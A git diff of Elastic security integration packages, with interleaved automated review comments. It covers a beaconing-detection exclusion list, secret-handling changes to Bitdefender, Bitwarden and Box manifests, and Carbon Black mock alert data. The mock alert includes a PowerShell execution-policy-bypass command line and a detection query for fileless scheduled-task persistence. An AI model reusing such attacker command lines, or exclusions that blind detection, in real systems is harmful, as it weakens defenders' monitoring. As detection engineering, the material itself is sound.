"Microsoft.Management.Services.IntuneWindowsAgent.exe", "Microsoft.SharePoint.exe", "Microsoft OneNote", "Microsoft 
PowerPoint", "Microsoft Teams Helper", "Microsoft Teams Helper (Renderer)", "Microsoft Update Assistant", "Microsoft Word", "ModuleCoreService.exe", "msedge.exe", "node", "node.exe", "nsurlsessiond", "OfficeC2RClient.exe", "ONENOTE.EXE", "officesvcmgr.exe", "OfficeClickToRun.exe", "OneDrive.exe", "parsec-fbf", "parsecd", "pingsender.exe", "SDXHelper.exe", "SearchApp.exe", "ServiceLayer.exe", "Skype for Business", "Slack.exe", "Slack Helper", "snapd", "smartscreen.exe", "softwareupdated", "Spotify.exe", "Spotify Helper", "ssm-agent-worker.exe", "ssm-document-worker.exe", "svchost.exe", "syspolicyd", "SystemIdleCheck.exe", "taskhostw.exe", "Teams", "Teams.exe", "trustd", "updater", "WINWORD.EXE", "WhatsApp Helper", "xpcproxy", "Zoom.exe", "zoom.us", "ZoomPresence"]
 should:
 - bool:
 filter:
@@ -382,5 +382,5 @@ sync:
 delay: 120s
 field: "@timestamp"
 _meta:
- fleet_transform_version: 1.1.0
+ fleet_transform_version: 1.2.0
 run_as_kibana_system: false
diff --git a/packages/beaconing/manifest.yml b/packages/beaconing/manifest.yml
index a8236c80dae..701c9615863 100644
--- a/packages/beaconing/manifest.yml
+++ b/packages/beaconing/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 3.0.0
 name: beaconing
 title: "Network Beaconing Identification"
-version: 1.1.0
+version: 1.2.0
 source:
 license: "Elastic-2.0"
 description: "Package to identify beaconing activity in your network events."
diff --git a/packages/bitdefender/changelog.yml b/packages/bitdefender/changelog.yml
index 76e2c210e27..c4114cdc822 100644
--- a/packages/bitdefender/changelog.yml
+++ b/packages/bitdefender/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.12.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8725
 - version: "1.11.0"
 changes:
 - description: Disable content-type checks
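Review bot: The `@@ -361,7 +361,7 @@` hunk adds `svchost.exe` (and `Microsoft.SharePoint.exe`) to the `must_not` `terms` on `process.name`, which drops those events from the beaconing transform on the bare process name alone; `svchost.exe` is the generic Windows service host name that is routinely masqueraded or used to host injected code, so this exclusion widens the detection blind spot far more than the application-specific names already in the list. Since the README change on this page describes the transform list as the performance layer and the rule-level exception list as the analyst-tunable one, consider leaving `svchost.exe` out of the transform and handling it in the rule exceptions, or, if the transform's source query also carries `process.executable`, constraining the exclusion to the expected system path rather than the name. The list itself is a single multi-thousand-character YAML line, which is why the diff cannot show which entries changed; a block sequence with one name per line would make future additions reviewable and let the changelog name them. The transform's `source` query begins well before this hunk.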
diff --git a/packages/bitdefender/data_stream/push_notifications/manifest.yml b/packages/bitdefender/data_stream/push_notifications/manifest.yml
index 9854c1424f3..a210bbbad63 100644
--- a/packages/bitdefender/data_stream/push_notifications/manifest.yml
+++ b/packages/bitdefender/data_stream/push_notifications/manifest.yml
@@ -30,12 +30,13 @@ streams:
 show_user: false
 default: /bitdefender/push/notification
 - name: authorization_value
- type: text
+ type: password
 title: Authorization Value
 description: Authorization header value
 multi: false
 required: false
 show_user: true
+ secret: true
 - name: ssl
 type: yaml
 title: TLS
diff --git a/packages/bitdefender/manifest.yml b/packages/bitdefender/manifest.yml
index 84936cd981b..6813aca7fe0 100644
--- a/packages/bitdefender/manifest.yml
+++ b/packages/bitdefender/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: bitdefender
 title: "BitDefender"
-version: "1.11.0"
+version: "1.12.0"
 source:
 license: "Elastic-2.0"
 description: "Ingest BitDefender GravityZone logs and data"
@@ -10,7 +10,7 @@ categories:
 - security
 conditions:
 kibana:
- version: "^8.5.1"
+ version: "^8.12.0"
 elastic:
 subscription: "basic"
 screenshots:
@@ -70,10 +70,11 @@ policy_templates:
 required: true
 default: https://cloud.gravityzone.bitdefender.com/api/v1.0/jsonrpc/push
 - name: api_key
- type: text
+ type: password
 title: BitDefender GravityZone API Key
 show_user: true
 required: true
+ secret: true
 - name: enable_request_tracer
 type: bool
 title: Enable request tracing
diff --git a/packages/bitwarden/changelog.yml b/packages/bitwarden/changelog.yml
index ba24346df65..3e9c5f5240a 100644
--- a/packages/bitwarden/changelog.yml
+++ b/packages/bitwarden/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.11.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8725
 - version: "1.10.2"
 changes:
 - description: Changed owners
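Review bot: The Kibana constraint in the `@@ -10,7 +10,7 @@` hunk of packages/bitdefender/manifest.yml moves from `^8.5.1` to `^8.12.0`, but the matching changelog entry on this page describes the release only as `Set sensitive values as secret.`, so operators on 8.5–8.11 will stop receiving updates for this package with no stated reason. Suggest spelling it out in the description, e.g. `- description: Set sensitive values as secret (requires Kibana 8.12.0 or later).`; the same applies to the bitwarden manifest in the next section, where the constraint goes from `^8.4.1` to `^8.12.0`. Marking `api_key` and `authorization_value` with `type: password` and `secret: true` is the right change, since the value is then handled by Fleet's secret storage instead of being embedded in plain form in the agent policy that any policy reader can view; the raised Kibana floor is presumably what that storage requires, which is another reason to document it.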
diff --git a/packages/bitwarden/manifest.yml b/packages/bitwarden/manifest.yml
index a1ede85805c..3c9caa7d7aa 100644
--- a/packages/bitwarden/manifest.yml
+++ b/packages/bitwarden/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: bitwarden
 title: Bitwarden
-version: "1.10.2"
+version: "1.11.0"
 source:
 license: Elastic-2.0
 description: Collect logs from Bitwarden with Elastic Agent.
@@ -11,7 +11,7 @@ categories:
 - credential_management
 conditions:
 kibana:
- version: "^8.4.1"
+ version: "^8.12.0"
 elastic:
 subscription: "basic"
 screenshots:
@@ -67,6 +67,7 @@ policy_templates:
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: token_url
 type: text
 title: Token URL
@@ -75,6 +76,7 @@ policy_templates:
 required: true
 show_user: false
 default: 'https://identity.bitwarden.com/connect/token'
+ secret: false
 - name: proxy_url
 type: text
 title: Proxy URL
diff --git a/packages/bluecoat/_dev/deploy/docker/docker-compose.yml b/packages/bluecoat/_dev/deploy/docker/docker-compose.yml
index 781a7ecec6a..c2437152547 100644
--- a/packages/bluecoat/_dev/deploy/docker/docker-compose.yml
+++ b/packages/bluecoat/_dev/deploy/docker/docker-compose.yml
@@ -7,14 +7,12 @@ services:
 - ${SERVICE_LOGS_DIR}:/var/log
 command: /bin/sh -c "cp /sample_logs/* /var/log/"
 bluecoat-director-udp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=udp /sample_logs/bluecoat-director-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=udp /sample_logs/bluecoat-director-*.log
 bluecoat-director-tcp:
- image: akroh/stream:v0.2.0
+ image: docker.elastic.co/observability/stream:v0.15.0
 volumes:
 - ./sample_logs:/sample_logs:ro
- entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=tcp /sample_logs/bluecoat-director-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9527 -p=tcp /sample_logs/bluecoat-director-*.log
diff --git a/packages/box_events/changelog.yml b/packages/box_events/changelog.yml
index e764a0504d1..381b0b953ad 100644
--- a/packages/box_events/changelog.yml
+++ b/packages/box_events/changelog.yml
@@ -1,4 +1,19 @@
 # newer versions go on top
+- version: "2.8.0"
+ changes:
+ - description: Use `event_id` field for document fingerprinting.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9498
+- version: "2.7.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9389
+- version: "2.6.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8725
 - version: "2.5.1"
 changes:
 - description: Changed owners
diff --git a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json index 1e01fec0525..06a324ea755 100644 --- a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json +++ b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-locations.log-expected.json @@ -78,12 +78,12 @@ "indicator": { "description": "IP 81.2.69.144 was observed to Download file ABC/DEF/xyz.txt by Box Excel Online Previewer", "geo": { - "ip": "81.2.69.144", "location": { "lat": "37.5555", "lon": "-120.6789" } }, + "ip": "81.2.69.144", "provider": "Box Excel Online Previewer", "type": "ipv4-addr" } @@ -159,7 +159,6 @@ "indicator": { "description": "IP Unknown IP was observed to Download file ABC/DEF/xyz.txt by Box Excel Online Previewer", "geo": { - "ip": "Unknown IP", "location": { "lat": "37.5555", "lon": "-120.6789" diff --git a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json index 3aaaba416e1..cfc438754b4 100644 --- a/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json +++ b/packages/box_events/data_stream/events/_dev/test/pipeline/test-suspicious-sessions.log-expected.json @@ -77,12 +77,12 @@ "indicator": { "description": "IP 81.2.69.142 was observed to Set shared link expiration file ABC/DEF/xyz.txt by ServiceName", "geo": { - "ip": "81.2.69.142", "location": { "lat": "37.5555", "lon": "-120.6789" } }, + "ip": "81.2.69.142", "provider": "ServiceName", "type": "user-account" } 
@@ -161,7 +161,6 @@ "indicator": { "description": "IP Unknown IP was observed to Set shared link expiration file ABC/DEF/xyz.txt by ServiceName", "geo": { - "ip": "Unknown IP", "location": { "lat": "37.5555", "lon": "-120.6789" diff --git a/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml b/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml index 0db0a69e22d..074f117a3e3 100644 --- a/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml +++ b/packages/box_events/data_stream/events/_dev/test/system/test-httpjson-config.yml @@ -11,3 +11,5 @@ data_stream: vars: stream_type: 'all' enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs b/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs index fac4f76365d..76d1684b005 100644 --- a/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs +++ b/packages/box_events/data_stream/events/agent/stream/httpjson.yml.hbs @@ -37,4 +37,8 @@ tags: {{/if}} {{#each tags as |tag i|}} - {{tag}} -{{/each}} \ No newline at end of file +{{/each}} +fields_under_root: true +fields: + _conf: + client_id: {{client_id}} diff --git a/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml b/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml index 55d1ce8b368..7aad12061c0 100644 --- a/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml +++ b/packages/box_events/data_stream/events/elasticsearch/ingest_pipeline/default.yml @@ -12,6 +12,12 @@ processors: - json: field: event.original target_field: box + - fingerprint: + fields: + - box.event_id + - _conf.client_id + target_field: "_id" + ignore_missing: true - date: field: box.recorded_at target_field: "@timestamp" 
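Review bot: The new `fingerprint` processor with `ignore_missing: true` still writes `_id` when only `box.event_id` is absent, because `_conf.client_id` is set on every document by the template change in httpjson.yml.hbs; every event lacking an `event_id` would then hash to the same `_id` and overwrite each other. Guarding it with `if: ctx.box?.event_id != null` keeps deduplication for well-formed events and lets the rest fall back to an auto-generated id. The `box` object it reads is produced by the preceding `json` processor in this hunk, so the guard can rely on it.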
@@ -1181,6 +1187,23 @@ processors: field: "_ingest._value.indicator.as.organization_name" target_field: "_ingest._value.indicator.as.organization.name" ignore_missing: true +# Move geo.ip out of geo and check for IP validity. + - foreach: + field: threat.enrichments + ignore_missing: true + processor: + convert: + field: "_ingest._value.indicator.geo.ip" + target_field: "_ingest._value.indicator.ip" + type: ip + ignore_failure: true + - foreach: + field: threat.enrichments + ignore_missing: true + processor: + remove: + field: "_ingest._value.indicator.geo.ip" + ignore_missing: true # AS lookup for stand-alone indicator - geoip: database_file: GeoLite2-ASN.mmdb @@ -1222,6 +1245,9 @@ processors: return false; } dropEmptyFields(ctx); + - remove: + field: _conf + ignore_missing: true on_failure: - set: field: event.kind diff --git a/packages/box_events/data_stream/events/fields/ecs.yml b/packages/box_events/data_stream/events/fields/ecs.yml index 8ed61a7c0a4..f0aaa28f258 100644 --- a/packages/box_events/data_stream/events/fields/ecs.yml +++ b/packages/box_events/data_stream/events/fields/ecs.yml @@ -72,6 +72,10 @@ name: threat.indicator.description - external: ecs name: threat.enrichments +- external: ecs + name: threat.enrichments.indicator.as.number +- external: ecs + name: threat.enrichments.indicator.as.organization.name - external: ecs name: threat.enrichments.indicator.description - external: ecs @@ -94,6 +98,8 @@ name: threat.enrichments.indicator.ip - external: ecs name: threat.enrichments.indicator.last_seen +- external: ecs + name: threat.enrichments.indicator.provider - external: ecs name: threat.enrichments.indicator.reference - external: ecs diff --git a/packages/box_events/data_stream/events/fields/fields.yml b/packages/box_events/data_stream/events/fields/fields.yml index 63c22514c5c..c7ab48b266b 100644 --- a/packages/box_events/data_stream/events/fields/fields.yml +++ b/packages/box_events/data_stream/events/fields/fields.yml 
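Review bot: The `convert` to `type: ip` runs with `ignore_failure: true` and the second `foreach` then removes `indicator.geo.ip` unconditionally, so a non-address value such as the `Unknown IP` seen in the expected-output fixtures on this page vanishes from the document without any trace. If dropping it is intentional, say so in the introducing comment, e.g. `# Move geo.ip out of geo and check for IP validity; values that are not valid IPs are dropped.`; otherwise give the convert an `on_failure` that appends to `error.message` instead of ignoring the failure.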
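Review bot: The `remove` of `_conf` is the last step of the main processor list, so any document that fails an earlier processor skips it and is indexed by the `on_failure` handler with `_conf.client_id` still present. Adding the same `- remove: field: _conf ignore_missing: true` to the `on_failure` block keeps the configured client id out of error documents. The `on_failure` block begins in this hunk but its body continues outside it.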
@@ -373,6 +373,12 @@ - name: entries type: group fields: + - name: etag + description: The HTTP etag of this folder + type: keyword + - name: sequence_id + description: A numeric identifier that represents the most recent user event that has been applied to this item + type: keyword - name: type description: Value is always `folder`. This field is an array type: keyword diff --git a/packages/box_events/docs/README.md b/packages/box_events/docs/README.md index e512db11d6b..320dcfb9268 100644 --- a/packages/box_events/docs/README.md +++ b/packages/box_events/docs/README.md @@ -236,8 +236,10 @@ Preserves a raw copy of the original event, added to the field `event.original`. | box.source.parent.name | The name of the folder | keyword | | box.source.parent.sequence_id | A numeric identifier that represents the most recent user event that has been applied to this item (parent) | keyword | | box.source.parent.type | Value is always `folder` | keyword | +| box.source.path_collection.entries.etag | The HTTP etag of this folder | keyword | | box.source.path_collection.entries.id | The unique identifier that represent a folder. This field is an array | keyword | | box.source.path_collection.entries.name | The name of the parent folder. This field is an array | keyword | +| box.source.path_collection.entries.sequence_id | A numeric identifier that represents the most recent user event that has been applied to this item | keyword | | box.source.path_collection.entries.type | Value is always `folder`. This field is an array | keyword | | box.source.path_collection.total_count | The number of folders in this list | long | | box.source.phone | Phone number | boolean | 
@@ -330,6 +332,9 @@ Preserves a raw copy of the original event, added to the field `event.original`. | rule.uuid | A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. | keyword | | tags | List of keywords used to tag each event. | keyword | | threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested | +| threat.enrichments.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| threat.enrichments.indicator.as.organization.name | Organization name. | keyword | +| threat.enrichments.indicator.as.organization.name.text | Multi-field of `threat.enrichments.indicator.as.organization.name`. | match_only_text | | threat.enrichments.indicator.description | Describes the type of action conducted by the threat. | keyword | | threat.enrichments.indicator.first_seen | The date and time when intelligence source first reported sighting this indicator. | date | | threat.enrichments.indicator.geo.city_name | City name. | keyword | 
@@ -341,6 +346,7 @@ Preserves a raw copy of the original event, added to the field `event.original`. | threat.enrichments.indicator.geo.region_name | Region name. | keyword | | threat.enrichments.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | | threat.enrichments.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.enrichments.indicator.provider | The name of the indicator's provider. | keyword | | threat.enrichments.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.enrichments.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | | threat.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | diff --git a/packages/box_events/manifest.yml b/packages/box_events/manifest.yml index fbef79d39d6..f6f41d49534 100644 --- a/packages/box_events/manifest.yml +++ b/packages/box_events/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: box_events title: Box Events -version: "2.5.1" +version: "2.8.0" description: "Collect logs from Box with Elastic Agent" type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" screenshots: - src: /img/box_screenshot.png title: "[Logs Box Events Integration] Events Dashboard" @@ -109,6 +109,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing @@ -124,6 +125,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: api_url type: text title: API URL 
@@ -140,6 +142,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: box_subject_type type: text title: Box Subject Type diff --git a/packages/carbon_black_cloud/_dev/build/docs/README.md b/packages/carbon_black_cloud/_dev/build/docs/README.md index 0b965795fac..a1a7c4b60b5 100644 --- a/packages/carbon_black_cloud/_dev/build/docs/README.md +++ b/packages/carbon_black_cloud/_dev/build/docs/README.md 
@@ -2,9 +2,29 @@ The VMware Carbon Black Cloud integration collects and parses data from the Carbon Black Cloud REST APIs and AWS S3 bucket. -## Compatibility +## Version 2.0.0+ Update Disclaimer +Carbon Black Cloud `Alerts API (v6)` [will be deactivated on July 31, 2024](https://developer.carbonblack.com/reference/carbon-black-cloud/api-migration/#migration-summary). After this, the current alert data stream will become unusable. To enable a smooth transition we have introduced a new data stream named `alert_v7` based on the major `Alerts API (v7)` schema changes and `Data Forwarder 2.0` schema changes. This data stream has significant changes compared to the original data stream and is only available for our new `CEL input` which is currently tagged as `[Beta]`. Please consult the official docs [Alerts v7](https://developer.carbonblack.com/reference/carbon-black-cloud/guides/api-migration/alerts-migration) and [Data Forwarder 2.0](https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/schema/latest/alert-2.0.0/) for further info. After July 31, 2024, the old alerts v6 data stream will be deprecated and removed from the HTTPJSON input and only the new `alert_v7` data stream will exist under the `CEL input`. + +## Version 1.21+ Update Disclaimer +Starting from version 1.21, if using multiple AWS data streams simultaneously configured to use AWS SQS, separate SQS queues should be configured per +data stream. The default values of file selector regexes have been commented out for this reason. The only reason the global queue now exists is to avoid +a breaking change while upgrading to version 1.21 and above. A separate SQS queue per data stream should help fix the data loss that's been occurring in the +older versions. + +## HTTPJSON vs CEL +Version 2.0.0 introduces the use of the CEL input. This input method is currently marked as [Beta] while the older HTTPJSON input method has been +marked as [Legacy]. 
The HTTPJSON input method will not receive enhancement changes and will not support the new `alert_v7` data stream. + +## Note (Important) +1. Do not enable both the HTTPJSON and CEL input methods within a single data stream; having both enabled simultaneously can cause unexpected/duplicated results, as they operate on the same data streams. -This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. +2. When using the AWS-S3 input, use either the old alert data stream or the new [Beta] alert_v7 data stream that supports the Data Forwarder 2.0 schema. + +3. The `alert_v7` data stream is supported by our new `Alert V7` dashboards. The old `Alert` dashboards will not reflect the new changes. + + +## Compatibility +This module has been tested against `Alerts API (v7) [Beta]`, `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. ## Requirements 
@@ -15,27 +35,30 @@ This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` a | Data Stream Name | Bucket List Prefix | | ----------------- | ---------------------- | + | Alert_v7 | alert_logs_v7 | | Alert | alert_logs | | Endpoint Event | endpoint_event_logs | | Watchlist Hit | watchlist_hit_logs | ### To collect data from AWS SQS, follow the below steps: 1. If data forwarding to an AWS S3 Bucket hasn't been configured, then first setup an AWS S3 Bucket as mentioned in the above documentation. -2. To setup an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). +2. To set up an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). - While creating an SQS Queue, please provide the same bucket ARN that has been generated after creating an AWS S3 Bucket. -3. Setup event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). - - The user has to perform Step 3 for all the data-streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for alert data stream.) +3. Set up event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). + - The user has to perform Step 3 for all the data streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for the alert data stream.) 
- For all the event notifications that have been created, select the event type as s3:ObjectCreated:*, select the destination type SQS Queue, and select the queue that has been created in Step 2. **Note**: - Credentials for the above AWS S3 and SQS input types should be configured using the [link](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html#aws-credentials-config). - Data collection via AWS S3 Bucket and AWS SQS are mutually exclusive in this case. + - When configuring SQS queues, separate queues should be used for each data stream instead of the global SQS queue from version 1.21 onwards to avoid data + loss. File selectors should not be used to filter out data stream logs using the global queue as it was in versions prior. ### In order to ingest data from the APIs you must generate API keys and API Secret Keys: 1. In Carbon Black Cloud, On the left navigation pane, click **Settings > API Access**. 2. Click Add API Key. 3. Give the API key a unique name and description. - - Select the appropriate access level type. Please check required Access Levels & Permissions for integration in below table. + - Select the appropriate access level type. Please check the required Access Levels & Permissions for integration in the table below. **Note:** To use a custom access level, select Custom from the Access Level type drop-down menu and specify the Custom Access Level. - Optional: Add authorized IP addresses. - You can restrict the use of an API key to a specific set of IP addresses for security reasons. @@ -74,6 +97,14 @@ This is the `alert` dataset. {{fields "alert"}} +### Alert + +This is the `alert_v7` dataset. + +{{event "alert_v7"}} + +{{fields "alert_v7"}} + ### Endpoint Event This is the `endpoint_event` dataset. diff --git a/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml b/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml index 96111623de2..18b84518747 100644 
--- a/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml
+++ b/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml
@@ -5,6 +5,12 @@ rules: - status_code: 200 body: | {"results":[{"type":"DEVICE_CONTROL","id":"test1","legacy_alert_id":"C8EB7306-AF26-4A9A-B677-814B3AF69720","org_key":"ABCD6X3T","create_time":"2020-11-17T22:05:13Z","last_update_time":"2020-11-17T22:05:13Z","first_event_time":"2020-11-17T22:02:16Z","last_event_time":"2020-11-17T22:02:16Z","threat_id":"t5678","severity":3,"category":"WARNING","device_id":2,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_name":"DESKTOP-002","device_username":"test34@demo.com","policy_id":6997287,"policy_name":"Standard","target_value":"MEDIUM","workflow":{"state":"OPEN","remediation":"","last_update_time":"2020-11-17T22:02:16Z","comment":"","changed_by":"Carbon Black"},"reason":"Access attempted on unapproved USB device SanDisk U3 Cruzer Micro (SN: 0875920EF7C2A304). A Deny Policy Action was applied.","reason_code":"6D578342-9DE5-4353-9C25-1D3D857BFC5B:DCAEB1FA-513C-4026-9AB6-37A935873FBC","device_location":"UNKNOWN","threat_cause_threat_category":"NON_MALWARE","threat_cause_vector":"REMOVABLE_MEDIA","threat_cause_cause_event_id":"FCEE2AF0-D832-4C9F-B988-F11B46028C9E","sensor_action":"DENY","run_state":"DID_NOT_RUN","policy_applied":"APPLIED","vendor_name":"SanDisk","vendor_id":"0x0781","product_name":"U3 Cruzer Micro","product_id":"0x5406","serial_number":"0875920EF7C2A304"}],"num_found":6197,"num_available":6197} + - path: /api/alerts/v7/orgs/xxxx/alerts/_search + methods: ["POST"] + responses: + - status_code: 200 + body: | + 
{"results":[{"org_key":"7DESJ9GN","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN","id":"1c6aba68-24cc-41e3-ad8e-4b545a587b55","type":"WATCHLIST","backend_timestamp":"2024-03-13T08:03:29.540Z","user_update_timestamp":null,"backend_update_timestamp":"2024-03-13T08:03:29.540Z","detection_timestamp":"2024-03-13T08:02:36.578Z","first_event_timestamp":"2024-03-13T08:00:09.894Z","last_event_timestamp":"2024-03-13T08:00:09.894Z","severity":5,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d","threat_id":"C21CA826573A8D974C1E93C8471AAB7F","primary_event_id":"re9M9hp8TbGLqyk6QXqQqA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2024-03-13T08:03:29.540Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2024-03-13T08:03:29.540Z","value":"NONE","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION"},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":6612391,"device_name":"EIP\\WW-20002","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"EIP\\Administrator","device_location":"UNKNOWN","device_external_ip":"75.98.230.194","device_internal_ip":"172.16.100.140","asset_group":[],"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a","report_name":"Execution - AMSI - New Fileless Scheduled Task Behavior Detected","report_description":"Newer Powershell versions introduced built-in 
cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.","report_tags":["execution","privesc","persistence","t1053","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1053/","ioc_id":"d1080521-e617-4e45-94e0-7a145c62c90a","ioc_hit":"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe","process_pid":5172,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3","process_md5":"2e5a8590cf6848968fc23de3fa1e25f1","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft 
